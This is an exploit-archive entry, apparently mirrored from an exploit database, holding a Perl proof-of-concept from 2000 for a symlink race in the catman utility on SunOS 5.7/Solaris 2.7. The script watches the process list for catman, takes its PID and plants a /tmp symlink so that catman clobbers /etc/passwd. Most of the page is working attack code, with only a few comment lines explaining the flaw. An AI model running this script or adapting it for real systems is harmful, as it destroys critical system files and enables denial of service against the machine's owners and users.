[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit
# Published : 2000-12-20
# Author : lwc
# Previous Title : Redhat 6.1 / 6.2 TTY Flood Users Exploit
# Next Title : Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit
#!/usr/local/bin/perl -w
#
# The problem is catman creates files in /tmp
# insecurly. They are based on the PID of the
# catman process, catman will happily clobber
# any files that are symlinked to that file.
# The idea of this script is to watch the
# process list for the catman process, get
# the pid and Create a symlink in /tmp to our
# file to be clobbered. This exploit depends
# on system speed and process load. This
# worked on a patched Solaris 2.7 box (August
# 2000 patch cluster)
# SunOS rootabega 5.7 Generic_106541-12 sun4u
# sparc SUNW,Ultra-1 lwc@vapid.betteros.org
# 11/21/2000 Vapid Labs.
# http://vapid.betteros.org
$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";
while(<ps>) {
@args = split " ", $_;
if (/catman/) {
print "Symlinking sman_$args[1] to $clobbern";
symlink($clobber,"/tmp/sman_$args[1]");
exit(1);
}
}
}
# www.Syue.com [2000-12-20]